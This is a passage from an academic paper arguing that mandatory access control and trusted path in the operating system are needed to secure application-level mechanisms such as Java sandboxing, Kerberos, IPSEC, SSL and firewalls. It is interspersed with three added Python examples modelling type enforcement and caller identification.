     An operating system's mandatory security policy may be divided into several kinds of policies, such as an access control policy, an authentication usage policy, and a
     cryptographic usage policy. A mandatory access control policy specifies how subjects may access objects under the control of the operating system. A mandatory
     authentication usage policy specifies what authentication mechanisms must be used to authenticate a principal to the system. A mandatory cryptographic usage policy
     specifies what cryptographic mechanisms must be used to protect data. Additionally, various sub-systems of the operating system may have their own mechanism usage
     policies. These subsystem-specific usage policies may be dependent on the cryptographic usage policy. For example, a network usage policy for a router might specify
     that sensitive network traffic should be protected using IPSEC ESP [4] in tunneling mode prior to being sent to an external network. The selection of a cryptographic
     algorithm for IPSEC ESP may be deferred to the cryptographic usage policy. 
     
     A secure system must provide a framework for defining the operating system's mandatory security policy and translating it to a form interpretable by the underlying
     mandatory security mechanisms of the operating system. Without such a framework, there can be no real confidence that the mandatory security mechanisms will
     provide the desired security properties. An operating system which provides mandatory security may nonetheless suffer from the presence of high bandwidth covert
     channels. This is an issue whenever the mandatory security policy is concerned with confidentiality. This should not, however, be a reason to ignore mandatory security.
     Even with covert channels, an operating system with basic mandatory controls improves security by increasing the required sophistication of the adversary. Once
     systems with basic mandatory controls become mainstream, covert channel exploitation will become more common and public awareness of the need to address covert
     channels in computing systems will increase [57].
     
     In any system which supports mandatory security, some applications require special privileges in the mandatory policy in order to perform some security-relevant
     function. Such applications are frequently called trusted applications because they are trusted to correctly perform some security-related function and because they are
     trusted to not misuse privileges required in order to perform that function. If the mandatory security mechanisms of a secure operating system only support
     coarse-grained privileges, then the security of the overall system may devolve to the security of the trusted applications on the system. To reduce the dependency on
     trusted applications, the mandatory security mechanisms of an operating system should be designed to support the principle of least privilege. Type enforcement is an
     example of a mandatory security mechanism which may be used both to limit trusted applications to the minimal set of privileges required for their function and to
     confine the damage caused by any misuse of these privileges [48][28]. 
     
     The mandatory security mechanisms of an operating system may be used to support security-related functionality in applications by rigorously ensuring that subsystems
     are unbypassable and tamperproof. For example, type enforcement may be used to implement assured pipelines to provide these properties. An assured pipeline ensures
     that data flowing from a designated source to a designated destination must pass through a security-related subsystem and ensures the integrity of the subsystem. Many
     of the security requirements of these applications may be ensured by the underlying mandatory security mechanisms of the operating system [48].
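
     The assured-pipeline property described above can be checked mechanically against a type-enforcement table. The following is an added
     example, not code from the paper or from any system it cites; the domain and type names and the table layout are hypothetical, modelled
     on the router scenario in which sensitive traffic must pass through IPSEC ESP before reaching an external network.

```python
"""Assured-pipeline check over a toy type-enforcement table (constructed example)."""
from collections import defaultdict, deque

# Hypothetical policy: (domain, type) -> permitted access modes.
# r = read, w = write, x = execute. Anything not listed is denied.
GOOD_POLICY = {
    ("app_d", "plaintext_t"): {"r", "w"},    # applications produce sensitive data
    ("esp_d", "plaintext_t"): {"r"},         # ESP subsystem reads it ...
    ("esp_d", "ciphertext_t"): {"w"},        # ... and emits protected data
    ("esp_d", "esp_exec_t"): {"r", "x"},     # subsystem code: executable, not writable
    ("netout_d", "ciphertext_t"): {"r"},     # external interface sees ciphertext only
    ("netout_d", "wire_t"): {"w"},
}

# Same table with two coarse grants added, as a misconfigured variant.
BAD_POLICY = dict(GOOD_POLICY)
BAD_POLICY[("app_d", "ciphertext_t")] = {"w"}   # lets data skip the subsystem
BAD_POLICY[("app_d", "esp_exec_t")] = {"w"}     # lets another domain alter its code

PIPELINE = {
    "source": "plaintext_t",
    "dest": "wire_t",
    "subsystem": "esp_d",
    "code_type": "esp_exec_t",
}


def flow_graph(policy, skip_domain=None):
    """Build information-flow edges: type -> reader domain, domain -> written type."""
    edges = defaultdict(set)
    for (domain, typ), modes in policy.items():
        if domain == skip_domain:
            continue
        if modes & {"r", "x"}:
            edges[typ].add(domain)
        if "w" in modes:
            edges[domain].add(typ)
    return edges


def find_path(edges, start, goal):
    """Breadth-first search; returns one shortest flow path or None."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in sorted(edges.get(path[-1], ())):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def check_pipeline(policy, source, dest, subsystem, code_type):
    """Return a list of findings; an empty list means the pipeline holds."""
    findings = []
    # The pipeline must exist at all.
    if find_path(flow_graph(policy), source, dest) is None:
        findings.append(f"no-flow: {source} cannot reach {dest}")
    # Unbypassable: with the subsystem removed, no flow may remain.
    bypass = find_path(flow_graph(policy, skip_domain=subsystem), source, dest)
    if bypass:
        findings.append("bypass: " + " -> ".join(bypass))
    # Tamperproof: no domain may write the subsystem's code type.
    for (domain, typ), modes in sorted(policy.items()):
        if typ == code_type and "w" in modes:
            findings.append(f"tamper: {domain} may write {code_type}")
    return findings


if __name__ == "__main__":
    for name, policy in (("good", GOOD_POLICY), ("bad", BAD_POLICY)):
        print(name, check_pipeline(policy, **PIPELINE) or "pipeline holds")
```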
     
     Operating system mandatory security mechanisms may also be used to rigorously confine an application to a unique security domain that is strongly separated from other
     domains in the system. Applications may still misbehave, but the resulting damage can now be restricted to within a single security domain. This confinement property is
     critical to controlling data flows in support of a system security policy [33]. In addition to supporting the safe execution of untrustworthy software, confinement may
     support functional requirements, such as an isolated testing environment or an insulated development environment [48]. For example, both the Sidewinder firewall and the
     DTE firewall use type enforcement for confinement [6][12]. 
     
     Although one could attempt to enforce a mandatory security policy through discretionary security mechanisms, such mechanisms cannot defend against careless or
     malicious users. Since discretionary security mechanisms place the burden for security on the individual users, carelessness by any one user at any point in time may
     lead to a violation of the mandatory policy. In contrast, mandatory security mechanisms limit the burden to the system security policy administrator. With only
     discretionary mechanisms, a malicious user with access to sensitive data and applications may directly release sensitive information in violation of the mandatory policy.
     Although that same user may also be able to leak sensitive information in ways that do not involve the computing system, the ability to leak the information through the
     computing system may increase the bandwidth of the leak and may decrease its traceability. In contrast, with mandatory security mechanisms, he may only leak
     sensitive information through covert channels, which limits the bandwidth and increases accountability, if covert channels are audited. 
     
     Furthermore, even with users who are benign and careful, the mandatory security policy may still be subverted by flawed or malicious applications when only
     discretionary mechanisms are used to enforce it (see footnote 2). The distinction between flawed and malicious software is not particularly important in this paper. In either case, an
     application may fail to apply security mechanisms required by the mandatory policy or may use security mechanisms in a way that is inconsistent with the user's intent.
     Mandatory security mechanisms may be used to ensure that security mechanisms are applied as required and can protect the user against inadvertent execution of
     untrustworthy applications. Although the user may have carefully defined the discretionary policy to properly implement the mandatory policy, an application may change
     the discretionary policy without the user's approval or knowledge. In contrast, the mandatory policy may only be changed by the system security policy administrator.
     
     _________________ 
     
          2. A discussion of the formal limitations of discretionary security mechanisms appears in [29]. 
     
     In the case of personal computing systems, where the user may be the system security policy administrator, mandatory security mechanisms are still helpful in 
     protecting against flawed or malicious software. In the simplest case, where there is only a distinction between the user's ordinary role and the user's role as system
     security policy administrator, the mandatory security mechanisms can protect the user against unintentional execution of untrustworthy software. With a further
     sub-division of the user's ordinary role into various roles based on function, mandatory security mechanisms can confine the damage that may be caused by flawed or
     malicious software. 
     
     Although there are a number of commercial operating systems with support for mandatory security, none of these systems have become mainstream. These systems
     have suffered from a fixed notion of mandatory security, thereby limiting their market appeal. Furthermore, these systems typically lack adequate support for
     constraining trusted applications. In order to reach a wider market, operating systems must support a more general notion of mandatory security and must support
     flexible configuration of mandatory policies. 
     
     Mainstream commercial operating systems rarely support the principle of least privilege even in their discretionary access control architecture. Many operating systems
     only provide a distinction between a completely privileged security domain and a completely unprivileged security domain. Even in Microsoft Windows NT, the privilege
     mechanism fails to adequately protect against malicious programs because it does not limit the privileges that a program inherits from the invoking process based on the
     trustworthiness of the program [65]. 
     
     Current microkernel-based research operating systems have tended to focus on providing primitive protection mechanisms which may be used to flexibly construct a
     higher-level security architecture. Many of these systems, such as the Fluke microkernel [23] and the Exokernel [41], use kernel-managed capabilities as the underlying
     protection mechanism. However, as discussed in [59], typical capability architectures are inadequate for supporting mandatory access controls with a high degree of
     flexibility and assurance. L4 [38] provides some support for mandatory controls through its clans and chiefs mechanism and its IPC mechanism for identifying senders
     and receivers but still lacks a coherent framework for using these mechanisms to meet the requirements of a mandatory policy. Furthermore, L4 assumes that there will
     only be a small number of distinct security domains [38]. Flask [56], a variant of the Fluke microkernel, provides a mandatory security framework similar to that of
     DTOS [43], a variant of the Mach microkernel; both systems provide mechanisms for mandatory access control and a mandatory policy framework. 
     
     Trusted path 
     
     A trusted path is a mechanism by which a user may directly interact with trusted software, which can only be activated by either the user or the trusted software and
     may not be imitated by other software [20]. In the absence of a trusted path mechanism, malicious software may impersonate trusted software to the user or may
     impersonate the user to trusted software. Such malicious software could potentially obtain sensitive information, perform functions on behalf of the user in violation of
     the user's intent, or trick the user into believing that a function has been invoked without actually invoking it. In addition to supporting trusted software in the base
     system, the trusted path mechanism should be extensible to support the subsequent addition of trusted applications by a system security policy administrator [28]. 
     
     The concept of a trusted path can be generalized to include interactions beyond just those between trusted software and users. The TNI introduces the concept of a
     trusted channel for communication between trusted software on different network components [44]. More generally, a mechanism that guarantees a mutually
     authenticated channel, or protected path, is necessary to ensure that critical system functions are not being spoofed. Although a protected path mechanism for local
     communications could be constructed in application space without direct authentication support in the operating system, it is preferable for an operating system to provide
     its own protected path mechanism since such a mechanism will be simpler to assure [59] and is likely to be more efficient. 
     
     Most mainstream commercial operating systems are utterly lacking in their support for either a trusted path mechanism or a protected path mechanism. Microsoft
     Windows NT does provide a trusted path for a small set of functions such as login authentication and password changing but lacks support for extending the trusted path
     mechanism to other trusted applications [65]. For local communications, NT does provide servers with the identity of their clients; however, it does not provide the server
     identity to the client.
     
     3 General Examples 
     
     This section argues that without operating system support for mandatory security and trusted path, application-space mechanisms for access control and cryptography
     cannot be implemented securely. These arguments will then be used to reinforce the discussion in section 4, which analyzes concrete examples. 
     
     3.1 Access Control 
     
     An application-space access control mechanism may be decomposed into an enforcer component and a decider component. When a subject attempts to access an
     object protected by the mechanism, the enforcer component must invoke the decider component, supplying it with the proper input parameters for the policy decision,
     and must enforce the returned decision. A common example of the required input parameters is the security attributes of the subject and the object. The decider
     component may also consult other external sources in order to make the policy decision. For example, it may use an external policy database and system information
     such as the current time. 
     
     If a malicious agent can tamper with any of the components in the access control mechanism or with any inputs to the decision, then the malicious agent can subvert the
     access control mechanism. Even if the components and all of the inputs are collocated within a single file, the operating system security mechanisms are still relied upon
     to protect the integrity of that file. As discussed in the prior section, only mandatory security mechanisms can rigorously provide such integrity guarantees. 
     
     Even with strong integrity guarantees for the policy decision inputs, if an authorized user invokes malicious software, the malicious software could change an object's
     security attributes or the policy database's rules without the user's knowledge or consent. The access control mechanism requires a trusted path mechanism in the
     operating system in order to ensure that arbitrary propagation of access cannot occur without explicit authorization by a user. 
     
     If a malicious agent can impersonate the decider component to the enforcer component, or if a malicious agent can impersonate any source of inputs to the decision,
     then the malicious agent can subvert the mechanism. If any of the components or external decision input sources are not collocated within a single application, then the
     access control mechanism requires a protected path mechanism. 
     
     If a malicious agent can bypass the enforcer component, then it may trivially subvert the access control mechanism. Mandatory security mechanisms in the operating
     system may be used to ensure that all accesses to the protected objects are mediated by the enforcer component. 
     
     3.2 Cryptography 
     
     An analysis of application-space cryptography may be decomposed into an analysis of the invocation of the cryptographic mechanism and an analysis of the
     cryptographic mechanism itself. The analysis of this section draws from the discussions in [51][15][60][61][55][52].
     
     As an initial basis for discussion, suppose that the cryptographic mechanism is a hardware token that implements the necessary cryptographic functions correctly and
     that there is a secure means by which the cryptographic keys are established in the token. Even in this simplified case, where the confidentiality and integrity of
     algorithms and keys are achieved without operating system support, this section will demonstrate that there are still vulnerabilities which may only be effectively
     addressed with the features of a secure operating system. 
     
     One vulnerability in this simplified case is that invocation of the token cannot be guaranteed. Any legitimate attempt to use the token might not result in a call to the
     token. The application that performs the cryptographic invocation might be bypassed or modified by malicious applications or malicious users. Malicious applications
     might impersonate the cryptographic token to the invoking application. 
     
     Mandatory security and protected path features in the operating system address this vulnerability. Mandatory security mechanisms may be used to ensure that the
     application that invokes the cryptographic token is unbypassable and tamperproof against both malicious software and malicious users. Unbypassability could also be
     achieved by using an inline cryptographic token, which is physically interposed between the sender of the data to be protected and the receiver of the protected data;
     however, this would be less flexible. A protected path mechanism may be used to ensure that malicious software cannot impersonate the cryptographic token to the
     invoking application. 
     
     Misuse of the cryptographic token is a second vulnerability in the simplified case. Misuse may involve the use of a service, algorithm, session or key by an unauthorized
     application. Without operating system support for identifying callers, a cryptographic token can do little more than require that a user activate it, after which, any service,
     algorithm, session or key authorized for that user may be used by any application on the system. In this case, the cryptographic token may be misused by applications
     operating on behalf of other users or may be misused by malicious software operating on behalf of the authorized user. Furthermore, unless the cryptographic token has
     a direct physical interface for user activation, malicious software can spoof the token to the user, obtain authentication information, and subsequently activate the
     cryptographic token without the user's knowledge or consent. Even with a direct physical interface to the user, it is impractical for the cryptographic token to require
     user confirmation for every cryptographic operation. 
     
     This second vulnerability may be addressed through mandatory security, trusted path and protected path features in the operating system. A trusted path mechanism
     obviates the need for a separate physical interface for activation. A protected path mechanism permits the cryptographic token to identify its callers and enforce
     fine-grained controls over the use of services, algorithms, sessions and keys. As an alternative to having the token deal with fine-grained controls over its usage,
     mandatory security mechanisms may also be used to provide such controls. For example, mandatory security mechanisms may be used to isolate the token for use only
     by applications executed by the user who activated the token. Furthermore, the mandatory security mechanisms can reduce the risk of malicious software being able to
     use the cryptographic token and may consequently limit the use of the trusted path mechanism to highly sensitive actions. 
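
     The caller-identification half of this argument can be seen with an operating system facility that reports the peer of a local channel.
     The following is an added example, not code from the paper; it assumes Linux and uses the SO_PEERCRED socket option, and the TokenService
     class, its request format and the key are hypothetical. It identifies callers only by user id, so it does not separate applications run
     by the same user and does not authenticate the service to the client.

```python
"""Key service that asks the kernel who its caller is (constructed example, Linux only)."""
import hashlib
import hmac
import os
import socket
import struct

# struct ucred on Linux: pid_t pid; uid_t uid; gid_t gid;
_UCRED = struct.Struct("iII")


def peer_identity(conn):
    """Return (pid, uid, gid) of the peer as recorded by the kernel, not as
    claimed by the peer in the message body."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, _UCRED.size)
    return _UCRED.unpack(raw)


class TokenService:
    """Stands in for the cryptographic token of section 3.2 (hypothetical)."""

    def __init__(self, key, activated_uid, allowed_ops):
        self._key = key
        self.activated_uid = activated_uid   # user who activated the token
        self.allowed_ops = set(allowed_ops)  # services enabled for that user

    def handle(self, conn):
        """Serve one request of the form b'<OP> <data>' on a connected socket."""
        _pid, uid, _gid = peer_identity(conn)
        op, _, data = conn.recv(4096).partition(b" ")
        if uid != self.activated_uid:
            # Caller runs on behalf of some other user: refuse.
            reply = b"DENY caller is not the activating user"
        elif op not in self.allowed_ops:
            reply = b"DENY operation not authorized"
        else:
            mac = hmac.new(self._key, data, hashlib.sha256).hexdigest()
            reply = b"OK " + mac.encode()
        conn.sendall(reply)
        return reply


def request(service, message):
    """Send one request over a local socket pair and return the reply.
    Both ends live in this process, so the kernel reports our own uid."""
    client, server = socket.socketpair()
    try:
        client.sendall(message)
        service.handle(server)
        return client.recv(4096)
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    key = b"constructed-demo-key"  # constructed value, not a real key
    mine = TokenService(key, os.getuid(), {b"MAC"})
    other = TokenService(key, os.getuid() + 1, {b"MAC"})
    print(request(mine, b"MAC hello"))       # OK <hex mac>
    print(request(mine, b"DECRYPT hello"))   # DENY operation not authorized
    print(request(other, b"MAC hello"))      # DENY caller is not the activating user
```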
     
     Hence, even in the simplest case, the features of a secure operating system are crucial to addressing the vulnerabilities of application-space cryptography. In the
     remainder of this section, the assumptions of the simplified case are removed, and the additional vulnerabilities are examined. 
     
     If the assumption that initial keys are securely established within the token is removed, then there is the additional vulnerability that the initial keys may be observed or
     modified by an unauthorized entity. Unless the initial keys are provided via a dedicated physical interface to the cryptographic token, the operating system must protect
     the path between the initial key source and the cryptographic token and may need to protect the initial key source itself. Mandatory security mechanisms may be used to
     rigorously protect the path and the key source. A trusted path may be required for initial keying. 
     
     If the assumption that the cryptographic mechanism is confined to a single hardware token is removed and the mechanism is implemented in software instead, the confidentiality and
     integrity of the cryptographic mechanism's code and data become dependent on the operating system, including both memory protection and file protection. Mandatory
     security is needed to rigorously ensure the mechanism's integrity and confidentiality. If any external inputs, such as input parameters to a random number generator, are
     used by the cryptographic mechanism, the input sources and the path between the input sources and the cryptographic mechanism must be protected with mandatory
     security mechanisms.
     
     4 Concrete Examples 
     
     This section further demonstrates that secure operating systems are necessary by showing that some widely accepted security solutions critically rely on the features of
     secure operating systems. In particular, this section examines mobile code security efforts, the Kerberos network authentication system, firewalls and network security
     protocols. 
     
     4.1 Mobile Code 
     
     A number of independently-developed security solutions for the World Wide Web, each with its own protection model, have been developed to protect against the
     threats from malicious mobile code. However, systems relying on these security solutions are vulnerable because of a lack of operating system support for security.
     Primarily, this section will emphasize this point by focusing on efforts to secure Java [27], but other efforts will also be used to highlight issues. 
     
     The primary threat that these solutions attempt to address is the threat of hostile mobile code gaining unauthorized access to a user's files and resources in order to
     compromise confidentiality or integrity. The threat is not limited to interpreted applets loaded from the network by a web browser; both [26] and [30] extend this threat
     model to include helper applications which may have been actively installed by a user. There is little distinction between mobile code and what is traditionally considered
     data. For example, consider that Postscript documents are actually programs with potential access to the local filesystem. Consequently, helper applications which
     operate on untrustworthy data, such as Postscript viewers, must either be executed in a less flexible mode of operation, or must be carefully confined by the operating
     system. 
     
     The basic Java Security Model is based on the notion of "sandboxing." The system relies on the type-safety of the language in conjunction with the Java Security
     Manager to prevent unauthorized actions [27]. Efforts are currently underway to add additional security features to Java, such as capabilities, an expanded access
     control model, or additional controls over access to certain class libraries [70]. 
     
     The fundamental limitation of these approaches is that none can be guaranteed to be tamperproof or unbypassable. For example, although the Java language is claimed
     to be secure, the Java Virtual Machine (JVM) will accept byte code which violates the language semantics and which can lead to security violations [32]. JVM
     implementation errors have led to violations of the language's semantics [19]. A significant portion of the Java system is currently in the form of native methods which
     are implemented as object code and are not subject to the JVM's type-safety checks. The JVM is not able to protect itself from tampering by other applications. Finally,
     the Java security model can offer no protection from the many other forms of malicious mobile code. In [30], the authors call for trusted systems to support a
     system-wide solution to address the threats presented by non-Java code. 
     
     Even if such problems with the JVM did not exist, these security solutions would still suffer from the fundamental limitation that they rely on application-space access
     control for security. They all depend on the local file system to preserve the integrity of the system code, including class files. All of the systems which store policy
     locally depend on file system access control to preserve the integrity of the policy files. Section 3.1 demonstrated the importance of secure operating system features for
     supporting application-space access control. 
     
     Another popular approach to "securing" mobile code is to require digitally signed applets and limit execution to those originating from trusted sources [27]. In fact, native
     ActiveX security is based entirely on digital signatures, as it has no form of access control [24][27]. The basic flaw with this approach is that it is an all-or-nothing
     proposition; the user cannot constrain a native ActiveX control to a limited security domain. Mandatory security mechanisms in the operating system may be used for
     this purpose, by confining the browser to a distinct security domain. 
     
     Note that, although not sufficient by themselves, digital signatures will play an important part in mobile code security, even on secure operating systems. They can reduce
     the risk of malicious code entering the system, provide some measure of trust that an applet will behave properly, and provide another piece of information to use in
     making an access control decision. However, as with the general application-space cryptography described in section 3.2, the digital signature verification mechanism
     depends on secure operating system features to guarantee invocation, to protect the integrity of the mechanism, and to protect the integrity of the locally cached public
     keys. 
     
     The need for an operating system trusted path mechanism was highlighted by [67] which demonstrates the ease with which a trojan horse applet can capture credit card
     numbers, PIN numbers or passwords by perfectly emulating a window system dialog box. The proposed solution was an ad hoc user-level trusted path mechanism
     which required a user to customize his dialog box with a complicated graphical pattern. This solution is not adequate as it only increases the sophistication required in the
     trojan horse. 
     
     Other systems attempt to provide alternative security solutions to the mobile code threat. The Janus system [26] interposes on Solaris system calls to constrain untrusted
     native applications, and Safe-Tcl [49] provides a "safe interpreter" which attempts to limit the command set available to untrusted code. However, like the Java security
     solutions, these systems are subject to the same vulnerabilities as any other application-space access control mechanism; consequently, they require secure operating
     system support. 
     
     Beyond enabling all of the mobile code systems mentioned above to function securely, a secure system could also simplify them. Rather than implementing their security
     primitives in application space where they are vulnerable, they could utilize the system security services to provide a better overall system. A properly designed secure
     system would provide a flexible, economic foundation with one consistent security model for all of the different virtual machine efforts to use. 
     
     4.2 Kerberos 
     
     Kerberos [31][47] is a network authentication service originally developed for Project Athena at MIT. In addition to providing an authentication service, Kerberos
     supports the establishment of session keys to support network confidentiality and integrity services. Derivatives of Kerberos have been used to provide authentication
     and key establishment services for AFS [64], DCE [53], and ONC RPC [21]. Kerberos and systems that rely on Kerberos have been suggested as a means of providing
     security for the World Wide Web [18][36][37]. 
     
     Kerberos is based on symmetric cryptography with a trusted key distribution center (KDC) for each realm. The Kerberos KDC has access to the secret key of every
     principal in its realm. Consequently, a compromise of the KDC can be catastrophic. This is generally addressed by requiring that the KDC be both physically secure and
     dedicated solely to running the Kerberos authentication server [46] (see footnote 3). A typical environment also uses physically-secure dedicated systems for the servers using
     Kerberos. Without these environmental assumptions, the Kerberos authentication service and the Kerberized server applications would require secure operating system
     features to rigorously ensure that they are tamperproof and unbypassable. For the sake of argument, the remainder of this section will consider these environmental
     assumptions to be true and focus only on the security of the client workstations. 
     
     ___________________ 
     
          3. Variants of Kerberos have been proposed that use asymmetric cryptography either to reduce the cost incurred by a penetration of the KDC or to completely eliminate
          the need for the KDC [63] [66][42][18]. 
     
     Kerberos was designed for an environment where the client workstations and the network are assumed to be completely untrustworthy [10][45]. However, since the
     software on the client workstation mediates all interactions between its user and the Kerberized server applications, this assumption implies that the Kerberized server
     applications must view all client applications as potentially malicious software. Furthermore, a Kerberized server application has no means of establishing a trusted path
     to a user on a client workstation, since that would require trusted code on the client workstation. Thus, in a system that uses Kerberos, malicious software executed by a
     user is free to arbitrarily modify or leak a user's information, with no means of confinement; no distinctions between a user's legitimate requests and the requests of
     malicious software are possible. Given the increasing ease with which malicious software may be introduced into a system, the Kerberos environmental model seems
     untenable. As noted in [14], secure end-to-end transactions require trusted code at both end points. 
     
     As a basis of further discussion, suppose that there is a base set of trustworthy software on the client workstations which is protected against tampering, but that the
     client workstation operating system still lacks mechanisms for mandatory security and trusted path. Furthermore, suppose that the client workstation is a single-user
     system which does not export any services to other systems. In spite of these assumptions, a user is still vulnerable to attacks by malicious software, such as mobile
     code downloaded by the user. 
     
     If the malicious software could spoof the client-side authentication program to the user, then it may be able to obtain a user's password. Even with one-time passwords,
     this attack would permit the malicious software to act on behalf of the user during the login session. A trusted path mechanism in the client workstation's operating
     system can be used to prevent such an attack. Additionally, such a trusted path mechanism in combination with support for a network protected path can be used to
     provide a trusted path between users and server applications. 
     
     If the malicious software can read the files used by the Kerberos client software to store tickets and session keys, then the malicious software may directly impersonate
     the user to the corresponding Kerberized server applications. Even if the session keys are encapsulated within a hardware cryptographic token, the malicious software
     can invoke the cryptographic token on behalf of the user, exploiting the misuse vulnerability discussed in section 3.2. Mandatory security mechanisms can be used to
     rigorously protect either the file or the cryptographic token against access by malicious software. 
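
     The ticket-cache and token cases from the paragraph above, as an added example (not code from the paper or from HWA): a toy Python model, loosely in the style of the domain and type enforcement work the paper cites [7], comparing a discretionary owner/mode check with a mandatory domain/type check. All domains, types, paths and UIDs are hypothetical.

```python
"""Toy model: discretionary vs. mandatory checks on a Kerberos ticket cache.

Every name below (domains, types, paths, UIDs) is hypothetical and constructed
for illustration; it does not describe any real system's policy.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Subject:
    uid: int
    domain: str   # mandatory label, assigned by the system, not by the user


@dataclass(frozen=True)
class Obj:
    path: str
    owner: int
    mode: int     # classic owner/other permission bits
    otype: str    # mandatory label


PERM_BITS = {"read": 4, "write": 2, "invoke": 1}

# Mandatory policy: (domain, object type) -> permitted operations.
# Any pair that is not listed is denied.
TE_POLICY = {
    ("user_d", "user_file_t"): {"read", "write"},
    ("krb_client_d", "krb_ticket_t"): {"read", "write"},
    ("krb_client_d", "crypto_token_t"): {"invoke"},
    ("mobile_code_d", "scratch_t"): {"read", "write"},
}

# Domain transitions on exec: (current domain, program type) -> new domain.
# There is deliberately no transition out of mobile_code_d.
TRANSITIONS = {
    ("user_d", "krb_client_exec_t"): "krb_client_d",
    ("user_d", "downloaded_exec_t"): "mobile_code_d",
}


def dac_allows(s, o, perm):
    """Discretionary check: only the user identity and mode bits matter."""
    shift = 6 if s.uid == o.owner else 0
    return bool((o.mode >> shift) & PERM_BITS[perm])


def mac_allows(s, o, perm):
    """Mandatory check: decided by the subject's domain and the object's type."""
    return perm in TE_POLICY.get((s.domain, o.otype), set())


def exec_program(s, program):
    """The uid is unchanged by exec; the domain follows the program's type."""
    return Subject(s.uid, TRANSITIONS.get((s.domain, program.otype), s.domain))


def access(s, o, perm, mandatory):
    """DAC always applies; the mandatory check is added when enabled."""
    if not dac_allows(s, o, perm):
        return False
    return mac_allows(s, o, perm) if mandatory else True


# Constructed sample objects for one single-user workstation.
LOGIN = Subject(uid=1000, domain="user_d")
KINIT = Obj("/usr/bin/kinit", 0, 0o755, "krb_client_exec_t")
APPLET = Obj("/home/alice/dl/applet", 1000, 0o700, "downloaded_exec_t")
CCACHE = Obj("/tmp/ticket_cache_1000", 1000, 0o600, "krb_ticket_t")
TOKEN = Obj("/dev/crypto_token0", 1000, 0o700, "crypto_token_t")


def scenario(mandatory):
    """The same user runs the Kerberos client and a downloaded program."""
    krb_client = exec_program(LOGIN, KINIT)
    downloaded = exec_program(LOGIN, APPLET)
    return {
        "client_reads_tickets": access(krb_client, CCACHE, "read", mandatory),
        "malware_reads_tickets": access(downloaded, CCACHE, "read", mandatory),
        "malware_invokes_token": access(downloaded, TOKEN, "invoke", mandatory),
    }


if __name__ == "__main__":
    for flag in (False, True):
        print("mandatory checks on" if flag else "discretionary only")
        for name, allowed in scenario(flag).items():
            print(f"  {name}: {'allowed' if allowed else 'denied'}")
```

     With only the discretionary check, all three requests succeed because every process carries the same UID; with the mandatory check enabled, only the Kerberos client's domain reaches the ticket cache or the token.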
     
     4.3 Network Security Protocols 
     
     The IPSEC network security protocols [5][3][4] are used to provide authentication, integrity, and confidentiality services at the IP layer. Typical implementations of the
     IPSEC protocols rely on application-space key management servers to perform key exchanges and supply keys for security associations. The IPSEC module in the
     network stack communicates with the local key management server via upcalls to retrieve the necessary information. 
     
     SSL [69] is another network security protocol that provides authentication, integrity, and confidentiality services and a negotiation service for keys and cryptographic
     algorithms. SSL, however, is implemented entirely in application space and requires no kernel modifications. SSL has been implemented as a library that interposes on
     socket calls to incorporate the SSL protocol between the underlying transport protocol of the socket (e.g., TCP) and the application protocol (e.g., HTTP). 
     
     Since it relies on application-space cryptography, the key management server used by IPSEC is subject to the vulnerabilities described in section 3.2 and requires
     mandatory security mechanisms in the operating system for adequate protection. In turn, since the protection provided by IPSEC depends on the protection of the keys,
     mandatory security mechanisms in the operating system are also crucial to meeting the security requirements of IPSEC. Since the complete SSL implementation
     operates in application space, it is directly subject to the vulnerabilities described in section 3.2 and requires mandatory security mechanisms in the operating system for
     adequate protection. 
     
     Both IPSEC and SSL are intended to provide secure channels. However, as noted in [14], an end-to-end secure transaction requires a secure channel and secure end
     points. If an attacker can penetrate one of the end points and directly access the unprotected data, then the protection provided by IPSEC and SSL is only illusory. 
     
     4.4 Firewalls 
     
     A network firewall is a mechanism for enforcing a trust boundary between two networks. The analysis of this section is based on the discussions in [17][9][11][6].
     Commonly, firewalls are used to maintain a separation between insiders and outsiders for an organization's computing resources. Internal firewalls may also be used to
     provide separation between different groups of insiders or to provide defense-in-depth against outsiders. 
     
     Modern firewall architectures typically involve the use of bastion hosts; in a screened subnet architecture, there may be an external bastion host on a perimeter network,
     which is highly exposed to outsiders, and an internal bastion host on the internal network, which is exposed to the external bastion host. The security of the bastion hosts
     is crucial to the security provided by the firewall. To reduce risk, bastion hosts are typically dedicated systems, only providing the minimal services required. Even with
     such minimal configuration, flaws in the proxy servers on the bastion host may permit penetration. However, mandatory security mechanisms in the operating systems of
     the bastion hosts may be used to confine proxy servers so that penetrations are narrowly limited. Similarly, the bastion host's mandatory security mechanisms may be
     used to protect proxy servers against tampering. 
     
     Firewalls provide no protection against malicious insiders. Typically, insiders can easily leak information through the firewall. Malicious insiders can construct tunnels to
     permit outsiders to perform inbound calls through the firewall or may provide ways of bypassing a firewall entirely. Additionally, malicious insiders can exploit data
     leaked between users within the firewall. Although internal firewalls may be used to partition insiders into multiple trust classes, the granularity of protection is quite
     limited in comparison to what can be provided by a secure operating system. 
     
     The ability of malicious insiders to leak data through the firewall can be confined by mandatory security mechanisms in the operating systems of the internal hosts.
     Likewise, mandatory security mechanisms in the operating systems of the internal hosts can confine outsiders who perform inbound calls through tunnels constructed by
     a malicious insider to the security domains in which the malicious insider is allowed to operate. 
     
     In addition to the threat of malicious insiders, a firewall is at risk from the threat of malicious software executed by benign insiders. Typically, firewalls do not require
     that insiders strongly authenticate themselves to the firewall in order to access external services through the firewall [40]. Hence, if a benign insider executes malicious
     software on an internal host, the malicious software may seek to subvert the protection of the firewall in the same fashion as a malicious insider. An example of using a
     malicious Java applet to enable outsiders to penetrate a firewall is given in [40]. Even if insiders are required to strongly authenticate themselves to the firewall, a benign
     insider may still execute a trojan horse whose overt purpose requires external access; in this case, the malicious software may still subvert the protection of the firewall. 
     
     Mandatory security mechanisms in the operating systems of the internal hosts may be used to protect users against execution of malicious software or to confine such
     software when it is executed. If strong authentication is required prior to accessing external services, mandatory security mechanisms could be used to ensure that only
     trustworthy software on the internal hosts can communicate with the strong authentication mechanism on the firewall. In any case, the mandatory security mechanisms
     would limit the ability of malicious software to leak information or support inbound calls. 
     
     Firewalls are also susceptible to malicious data attacks [62]. Some example malicious data attacks relevant to firewalls are described in [68][40][16]. As with malicious
     insiders and malicious software, mandatory security mechanisms in the operating systems of the bastion hosts and the internal hosts may be used to confine malicious
     data attacks. 
     
     When inbound services are supported by a firewall, the firewall itself cannot protect the remote system against compromise. The remote system's operating system
